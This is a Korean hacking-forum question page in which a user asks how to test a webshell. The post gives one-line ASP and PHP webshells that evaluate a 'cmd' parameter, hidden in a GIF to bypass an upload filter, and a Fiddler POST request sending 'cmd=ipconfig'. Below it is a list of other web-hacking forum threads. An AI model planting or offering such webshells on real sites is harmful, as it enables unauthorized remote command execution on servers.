214,

2/11

회원가입

로그인

stoopynice

웹쉘 관련 질문있습니다.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_Web&no=209 [복사]

그 파일 업로드 우회해서 (gif 파일에 아래 코드를 넣어서)
<%execute(request("cmd"))%>
<?php eval($_POST[cmd]);?>
페이지에 삽입한다음에 ipconfig같은 명령을 실험해보고 싶은데
(위에 코드가 cmd 불러와서 cmd 명령하는거죠?)
피들러에 composer 탭에 아래 내용 보내면 되나요??
POST http://\\\\/index.php?***.gif
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: ***/index.php
WS=110&CCODE=000101
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
DNT: 1
Host: ***
Cookie: PHPSESSID=h6ddjfsn45r1sqc9tvg2p6pje0
Content-Length: 9
cmd=ipconfig;

요런식으로 execute해서 테스트하면되나요?

Hit : 4674 Date : 2015/07/26 12:22

194

웹해킹 할때 필요한 웹(프로그래밍)언어[2]

ralehgus123

05/12

5434

193

이번에 학교에서 OWASP스터디를 시작했는데요 여쭤볼게 좀많아서...ㅋ[1]

heizelnet

07/17

5231

192

[웹질문] 사이트 소스를 통째로 갖고오는 툴이 있나요?[2]

helpwizet

03/08

5225

191

메일 해킹에 대해서 문의 합니다[5]

wqw3

12/16

5049

190

웹해킹 관련 질문 좀 드립니다.[2]

bigshott

12/16

5049

189

웹공격 Top3[3]

Pang

02/07

5048

188

파일 업로드 취약점 질문 입니다.[2]

bigshott

12/25

5009

187

Paros 툴 관련 질문[2]

stalaction

10/21

4939

186

webhacking.kr[1]

가면속의미소

04/28

4925

185

웹해킹 방법? 질문합니다.[1]

wilmamom

01/23

4896

184

매직쿼터 우회 방법에 대해 질문드립니다.[1]

tpdbs953

10/17

4863

183

sessionid는 어떤종류의 암호로 인코딩 되는건가요?[2]

kangms0801

04/03

4816

182

vbscript로 클라이언트 신뢰할 수 있는 사이트 등록 하는 방법이 궁금합니다

lekel09

10/10

4745

181

SQL Injection 공격기법 질문드립니다.[3]

kmc8724

07/03

4730

180

XSS 해킹 질문[3]

test11

03/07

4727

179

로그인 페이지 구현중 header 함수의 의미[2]

ka0r1

04/10

4720

178

웹해킹 공부순서를 알려주세요..[2]

nooooooob

02/28

4696

웹쉘 관련 질문있습니다.

stoopynice

07/26

4673

176

header와 body가 구분되어 있는 이유?[4]

ka0r1

04/12

4657

175

이미지안에 리다이렉트 소스(악용목적X)[2]

tjdgus1515

12/06

4622

[1] 2 [3][4][5][6][7][8][9][10]..[11]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org